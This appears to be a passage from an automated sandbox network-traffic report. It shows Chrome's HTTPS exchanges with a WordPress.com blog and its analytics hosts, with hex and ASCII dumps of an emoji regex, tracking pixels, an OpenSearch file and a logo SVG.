                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC1369INData Raw: 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 64 38 33 63 5c 75 64 66 66 66 5c 75 32 30 30 64 5c 75 64 38 33 65 5c 75 64 64 31 64 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 65 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 64 38 33 63 5c 75 64 66 66 62 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 64 38 33 63 5c 75 64 66 66 62 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 64 38 33 63 5b 5c 75
                                                                                                                                                                                                                                                                  Data Ascii: \ud83c[\udffb-\udfff]|\ud83d\udc68\ud83c\udfff\u200d\ud83e\udd1d\u200d\ud83d\udc68\ud83c[\udffb-\udffe]|\ud83d\udc69\ud83c\udffb\u200d\u2764\ufe0f\u200d\ud83d\udc68\ud83c[\udffb-\udfff]|\ud83d\udc69\ud83c\udffb\u200d\u2764\ufe0f\u200d\ud83d\udc69\ud83c[\u
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC1369INData Raw: 66 66 66 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 64 38 33 63 5c 75 64 66 66 65 5c 75 32 30 30 64 5c 75 64 38 33 65 5c 75 64 64 31 64 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 64 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 64 38 33 63 5c 75 64 66 66 66 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 64 38 33 63 5c 75 64 66 66 66 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 66
                                                                                                                                                                                                                                                                  Data Ascii: fff]|\ud83d\udc69\ud83c\udffe\u200d\ud83e\udd1d\u200d\ud83d\udc69\ud83c[\udffb-\udffd\udfff]|\ud83d\udc69\ud83c\udfff\u200d\u2764\ufe0f\u200d\ud83d\udc68\ud83c[\udffb-\udfff]|\ud83d\udc69\ud83c\udfff\u200d\u2764\ufe0f\u200d\ud83d\udc69\ud83c[\udffb-\udfff
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC1369INData Raw: 64 38 33 64 5c 75 64 63 38 62 5c 75 32 30 30 64 5c 75 64 38 33 64 5b 5c 75 64 63 36 38 5c 75 64 63 36 39 5d 7c 5c 75 64 38 33 65 5c 75 64 65 66 31 5c 75 64 38 33 63 5c 75 64 66 66 62 5c 75 32 30 30 64 5c 75 64 38 33 65 5c 75 64 65 66 32 5c 75 64 38 33 63 5b 5c 75 64 66 66 63 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 65 5c 75 64 65 66 31 5c 75 64 38 33 63 5c 75 64 66 66 63 5c 75 32 30 30 64 5c 75 64 38 33 65 5c 75 64 65 66 32 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 5c 75 64 66 66 64 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 65 5c 75 64 65 66 31 5c 75 64 38 33 63 5c 75 64 66 66 64 5c 75 32 30 30 64 5c 75 64 38 33 65 5c 75 64 65 66 32 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 5c 75 64 66 66 63 5c 75 64 66 66 65 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 65 5c 75 64
                                                                                                                                                                                                                                                                  Data Ascii: d83d\udc8b\u200d\ud83d[\udc68\udc69]|\ud83e\udef1\ud83c\udffb\u200d\ud83e\udef2\ud83c[\udffc-\udfff]|\ud83e\udef1\ud83c\udffc\u200d\ud83e\udef2\ud83c[\udffb\udffd-\udfff]|\ud83e\udef1\ud83c\udffd\u200d\ud83e\udef2\ud83c[\udffb\udffc\udffe\udfff]|\ud83e\ud
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC1369INData Raw: 64 64 34 5c 75 64 64 64 36 2d 5c 75 64 64 64 64 5d 29 28 3f 3a 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 66 5d 29 3f 5c 75 32 30 30 64 5b 5c 75 32 36 34 30 5c 75 32 36 34 32 5d 5c 75 66 65 30 66 7c 28 3f 3a 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 36 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 36 7c 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 37 5c 75 32 30 30 64 5c 75 64 38 33 64 5b 5c 75 64 63 36 36 5c 75 64 63 36 37 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 32 30 30 64 5c 75 64
                                                                                                                                                                                                                                                                  Data Ascii: dd4\uddd6-\udddd])(?:\ud83c[\udffb-\udfff])?\u200d[\u2640\u2642]\ufe0f|(?:\ud83d\udc68\u200d\ud83d\udc68\u200d\ud83d\udc66\u200d\ud83d\udc66|\ud83d\udc68\u200d\ud83d\udc68\u200d\ud83d\udc67\u200d\ud83d[\udc66\udc67]|\ud83d\udc68\u200d\ud83d\udc69\u200d\ud
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC1369INData Raw: 5c 75 64 38 33 64 5c 75 64 63 61 62 7c 5c 75 64 38 33 65 5c 75 64 64 33 63 5c 75 32 30 30 64 5c 75 32 36 34 30 5c 75 66 65 30 66 7c 5c 75 64 38 33 65 5c 75 64 64 33 63 5c 75 32 30 30 64 5c 75 32 36 34 32 5c 75 66 65 30 66 7c 5c 75 64 38 33 65 5c 75 64 64 64 65 5c 75 32 30 30 64 5c 75 32 36 34 30 5c 75 66 65 30 66 7c 5c 75 64 38 33 65 5c 75 64 64 64 65 5c 75 32 30 30 64 5c 75 32 36 34 32 5c 75 66 65 30 66 7c 5c 75 64 38 33 65 5c 75 64 64 64 66 5c 75 32 30 30 64 5c 75 32 36 34 30 5c 75 66 65 30 66 7c 5c 75 64 38 33 65 5c 75 64 64 64 66 5c 75 32 30 30 64 5c 75 32 36 34 32 5c 75 66 65 30 66 7c 5c 75 64 38 33 64 5c 75 64 63 30 38 5c 75 32 30 30 64 5c 75 32 62 31 62 7c 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 29 7c 5b 23 2a 30 2d
                                                                                                                                                                                                                                                                  Data Ascii: \ud83d\udcab|\ud83e\udd3c\u200d\u2640\ufe0f|\ud83e\udd3c\u200d\u2642\ufe0f|\ud83e\uddde\u200d\u2640\ufe0f|\ud83e\uddde\u200d\u2642\ufe0f|\ud83e\udddf\u200d\u2640\ufe0f|\ud83e\udddf\u200d\u2642\ufe0f|\ud83d\udc08\u200d\u2b1b|\ud83d\udc26\u200d\u2b1b)|[#*0-
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC1369INData Raw: 30 33 64 5c 75 33 32 39 37 5c 75 33 32 39 39 5d 29 28 3f 3a 5c 75 66 65 30 66 7c 28 3f 21 5c 75 66 65 30 65 29 29 7c 28 3f 3a 28 3f 3a 5c 75 64 38 33 63 5b 5c 75 64 66 63 62 5c 75 64 66 63 63 5d 7c 5c 75 64 38 33 64 5b 5c 75 64 64 37 34 5c 75 64 64 37 35 5c 75 64 64 39 30 5d 7c 5c 75 64 38 33 65 5c 75 64 65 66 30 7c 5b 5c 75 32 36 31 64 5c 75 32 36 66 37 5c 75 32 36 66 39 5c 75 32 37 30 63 5c 75 32 37 30 64 5d 29 28 3f 3a 5c 75 66 65 30 66 7c 28 3f 21 5c 75 66 65 30 65 29 29 7c 28 3f 3a 5c 75 64 38 33 63 5b 5c 75 64 66 38 35 5c 75 64 66 63 32 2d 5c 75 64 66 63 34 5c 75 64 66 63 37 5c 75 64 66 63 61 5d 7c 5c 75 64 38 33 64 5b 5c 75 64 63 34 32 5c 75 64 63 34 33 5c 75 64 63 34 36 2d 5c 75 64 63 35 30 5c 75 64 63 36 36 2d 5c 75 64 63 36 39 5c 75 64 63 36 65
                                                                                                                                                                                                                                                                  Data Ascii: 03d\u3297\u3299])(?:\ufe0f|(?!\ufe0e))|(?:(?:\ud83c[\udfcb\udfcc]|\ud83d[\udd74\udd75\udd90]|\ud83e\udef0|[\u261d\u26f7\u26f9\u270c\u270d])(?:\ufe0f|(?!\ufe0e))|(?:\ud83c[\udf85\udfc2-\udfc4\udfc7\udfca]|\ud83d[\udc42\udc43\udc46-\udc50\udc66-\udc69\udc6e


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  27192.168.2.1649737192.0.76.34437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC903OUTGET /t.gif?is_current_user_blog_owner=false&_en=wpcom_marketing_bar_impression&_ui=17YqG79Brj34dSgrHP4bzBgK&_ut=anon&_ts=1730228981995&_tz=4&_lg=en-US&_pf=Win32&_ht=1024&_wd=1280&_sx=0&_sy=0&_dl=https%3A%2F%2Fdartergary.wordpress.com%2F&_dr=&blog_id=238502921&blog_tz=-4&user_lang=en&blog_lang=en&user_id=0&_rt=1730228981996&_=_ HTTP/1.1
                                                                                                                                                                                                                                                                  Host: pixel.wp.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                  Referer: https://dartergary.wordpress.com/
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC222INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:09:43 GMT
                                                                                                                                                                                                                                                                  Content-Type: image/gif
                                                                                                                                                                                                                                                                  Content-Length: 43
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 01 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b
                                                                                                                                                                                                                                                                  Data Ascii: GIF89a!,L;


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  28192.168.2.1649700192.0.78.124437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC352OUTGET /osd.xml HTTP/1.1
                                                                                                                                                                                                                                                                  Host: dartergary.wordpress.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC507INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:09:44 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/xml
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  X-hacker: Want root? Visit join.a8c.com/hacker and mention this header.
                                                                                                                                                                                                                                                                  Host-Header: WordPress.com
                                                                                                                                                                                                                                                                  Vary: accept, content-type, cookie
                                                                                                                                                                                                                                                                  Expires: Wed, 30 Oct 2024 18:12:36 +0000
                                                                                                                                                                                                                                                                  Cache-Control: max-age=86400, public
                                                                                                                                                                                                                                                                  X-nc: HIT dfw 159
                                                                                                                                                                                                                                                                  X-ac: 1.dfw _dfw MISS
                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC862INData Raw: 33 39 66 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 20 3f 3e 0a 3c 4f 70 65 6e 53 65 61 72 63 68 44 65 73 63 72 69 70 74 69 6f 6e 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 61 39 2e 63 6f 6d 2f 2d 2f 73 70 65 63 2f 6f 70 65 6e 73 65 61 72 63 68 2f 31 2e 31 2f 22 20 78 6d 6c 6e 73 3a 6d 6f 7a 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 32 30 30 36 2f 62 72 6f 77 73 65 72 2f 73 65 61 72 63 68 2f 22 3e 0a 09 3c 53 68 6f 72 74 4e 61 6d 65 3e 53 69 74 65 20 54 69 74 6c 65 3c 2f 53 68 6f 72 74 4e 61 6d 65 3e 0a 09 3c 44 65 73 63 72 69 70 74 69 6f 6e 3e 53 65 61 72 63 68 20 53 69 74 65 20 54 69 74 6c 65 20 2d 20 3c 2f 44 65 73 63 72 69 70 74 69 6f 6e 3e 0a 09
                                                                                                                                                                                                                                                                  Data Ascii: 39f<?xml version="1.0" encoding="UTF-8" ?><OpenSearchDescription xmlns="http://a9.com/-/spec/opensearch/1.1/" xmlns:moz="http://www.mozilla.org/2006/browser/search/"><ShortName>Site Title</ShortName><Description>Search Site Title - </Description>
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC523INData Raw: 2f 49 6d 61 67 65 3e 0a 09 3c 49 6d 61 67 65 20 68 65 69 67 68 74 3d 22 36 34 22 20 77 69 64 74 68 3d 22 36 34 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 3e 68 74 74 70 73 3a 2f 2f 73 2d 73 73 6c 2e 0d 0a 31 62 37 0d 0a 77 6f 72 64 70 72 65 73 73 2e 63 6f 6d 2f 69 2f 6c 6f 67 6f 2f 67 72 61 79 2d 77 68 69 74 65 2d 74 72 61 6e 73 70 61 72 65 6e 74 2d 36 34 2e 70 6e 67 3c 2f 49 6d 61 67 65 3e 0a 09 3c 51 75 65 72 79 20 72 6f 6c 65 3d 22 65 78 61 6d 70 6c 65 22 20 73 65 61 72 63 68 54 65 72 6d 73 3d 22 70 68 6f 74 6f 67 72 61 70 68 79 22 20 2f 3e 0a 09 3c 54 61 67 73 3e 62 6c 6f 67 3c 2f 54 61 67 73 3e 0a 09 3c 44 65 76 65 6c 6f 70 65 72 3e 41 75 74 6f 6d 61 74 74 69 63 3c 2f 44 65 76 65 6c 6f 70 65 72 3e 0a 09 3c 53 79 6e 64 69 63 61 74 69 6f 6e
                                                                                                                                                                                                                                                                  Data Ascii: /Image><Image height="64" width="64" type="image/png">https://s-ssl.1b7wordpress.com/i/logo/gray-white-transparent-64.png</Image><Query role="example" searchTerms="photography" /><Tags>blog</Tags><Developer>Automattic</Developer><Syndication


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  29192.168.2.1649740192.0.77.324437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC392OUTGET /wp-content/blog-plugins/marketing-bar/images/wpcom-mark.svg HTTP/1.1
                                                                                                                                                                                                                                                                  Host: s0.wp.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:09:44 GMT
                                                                                                                                                                                                                                                                  Content-Type: image/svg+xml
                                                                                                                                                                                                                                                                  Content-Length: 1237
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Last-Modified: Fri, 19 May 2023 01:49:09 GMT
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  ETag: "6466d595-4d5"
                                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  Expires: Fri, 24 Jan 2025 09:24:43 GMT
                                                                                                                                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                                  X-ac: 4.dfw _dfw MISS
                                                                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  X-nc: HIT dfw 2
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC875INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 31 32 20 38 31 32 2e 30 32 22 20 66 69 6c 6c 3d 22 23 31 30 31 35 31 37 22 3e 3c 74 69 74 6c 65 3e 77 6f 72 64 70 72 65 73 73 64 6f 74 63 6f 6d 2d 6d 61 72 6b 2d 62 6c 61 63 6b 3c 2f 74 69 74 6c 65 3e 3c 67 20 69 64 3d 22 4c 61 79 65 72 5f 32 22 20 64 61 74 61 2d 6e 61 6d 65 3d 22 4c 61 79 65 72 20 32 22 3e 3c 67 20 69 64 3d 22 42 6c 61 63 6b 5f 57 22 20 64 61 74 61 2d 6e 61 6d 65 3d 22 42 6c 61 63 6b 20 57 22 3e 3c 70 61 74 68 20 64 3d 22 4d 34 30 36 2c 30 43 31 38 32 2e 31 33 2c 30 2c 30 2c 31 38 32 2e 31 33 2c 30 2c 34 30 36 53 31 38 32 2e 31 33 2c 38 31 32 2c 34 30 36 2c 38 31 32 2c 38 31 32
                                                                                                                                                                                                                                                                  Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 812 812.02" fill="#101517"><title>wordpressdotcom-mark-black</title><g id="Layer_2" data-name="Layer 2"><g id="Black_W" data-name="Black W"><path d="M406,0C182.13,0,0,182.13,0,406S182.13,812,406,812,812
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC362INData Raw: 33 36 33 2e 36 31 2c 33 36 33 2e 36 31 2c 30 2c 30 2c 31 2c 32 34 36 2e 34 39 2c 39 35 2e 38 34 63 2d 31 2e 35 36 2d 2e 31 31 2d 33 2e 31 2d 2e 33 2d 34 2e 37 32 2d 2e 33 2d 33 35 2e 38 36 2c 30 2d 36 31 2e 33 2c 33 31 2e 32 33 2d 36 31 2e 33 2c 36 34 2e 37 39 2c 30 2c 33 30 2e 30 38 2c 31 37 2e 33 35 2c 35 35 2e 35 32 2c 33 35 2e 38 36 2c 38 35 2e 36 31 2c 31 33 2e 38 37 2c 32 34 2e 33 31 2c 33 30 2e 30 39 2c 35 35 2e 35 34 2c 33 30 2e 30 39 2c 31 30 30 2e 36 36 71 30 2c 34 36 2e 38 39 2d 32 37 2e 37 38 2c 31 31 38 4c 35 38 38 2e 32 32 2c 36 32 37 2e 32 34 5a 4d 35 38 39 2e 35 32 2c 37 32 31 2e 35 2c 37 30 31 2c 33 39 39 2e 31 35 63 32 30 2e 38 34 2d 35 32 2e 30 38 2c 32 37 2e 37 37 2d 39 33 2e 37 32 2c 32 37 2e 37 37 2d 31 33 30 2e 37 34 61 32 37 39 2e
                                                                                                                                                                                                                                                                  Data Ascii: 363.61,363.61,0,0,1,246.49,95.84c-1.56-.11-3.1-.3-4.72-.3-35.86,0-61.3,31.23-61.3,64.79,0,30.08,17.35,55.52,35.86,85.61,13.87,24.31,30.09,55.54,30.09,100.66q0,46.89-27.78,118L588.22,627.24ZM589.52,721.5,701,399.15c20.84-52.08,27.77-93.72,27.77-130.74a279.


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  30192.168.2.1649744192.0.76.34437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC453OUTGET /g.gif?blog=238502921&v=wpcom&tz=-4&user_id=0&subd=dartergary&host=dartergary.wordpress.com&ref=&rand=0.82970019227276 HTTP/1.1
                                                                                                                                                                                                                                                                  Host: pixel.wp.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC222INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:09:44 GMT
                                                                                                                                                                                                                                                                  Content-Type: image/gif
                                                                                                                                                                                                                                                                  Content-Length: 50
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC50INData Raw: 47 49 46 38 39 61 06 00 05 00 80 01 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 06 00 05 00 00 02 09 0c 62 78 89 cd 6a 80 0c 05 00 3b
                                                                                                                                                                                                                                                                  Data Ascii: GIF89a!,bxj;


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  31192.168.2.1649742192.0.76.34437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC414OUTGET /g.gif?x_stats-initial-visibility=visible&v=wpcom-no-pv&rand=0.7921517821766884 HTTP/1.1
                                                                                                                                                                                                                                                                  Host: pixel.wp.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC222INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:09:44 GMT
                                                                                                                                                                                                                                                                  Content-Type: image/gif
                                                                                                                                                                                                                                                                  Content-Length: 50
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC50INData Raw: 47 49 46 38 39 61 06 00 05 00 80 01 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 06 00 05 00 00 02 09 0c 62 78 89 cd 6a 80 0c 05 00 3b
                                                                                                                                                                                                                                                                  Data Ascii: GIF89a!,bxj;


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  32192.168.2.1649743192.0.76.34437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC725OUTGET /g.gif?crypt=UE40eW5QN0p8M2Y%2FRE1mJVY3bm9aR3VCbS9mWm1pRyZuJS1LX1t5QmRXZzE3RC9rQWZHK1FjbDltdWdaMVFFZTcxUGVHLWR0WTJoODFFSDFKMmdBdysuWmJ6fkpUJXxZPVlCQm1qNSxSYkxYZXV0d1ZYLjE1aVdvYUNlcHlGVl0vNXF%2BVEw2QmdPMUg9NjdbdU05bi4%2FZnomWzdTdHwyV3RtM25VTEE0Sm50bFozWEt5VWJ5UDU4Nk1NQ0E1R3A4VityWnxrYS80QUtiWTkuXXc1NnN5RGtkNGpCY2I9TyxuTFNJXW5FWGtVLEMxK0h%2BLndnQnc%3D&v=wpcom-no-pv&rand=0.16543343148914724 HTTP/1.1
                                                                                                                                                                                                                                                                  Host: pixel.wp.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC222INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:09:44 GMT
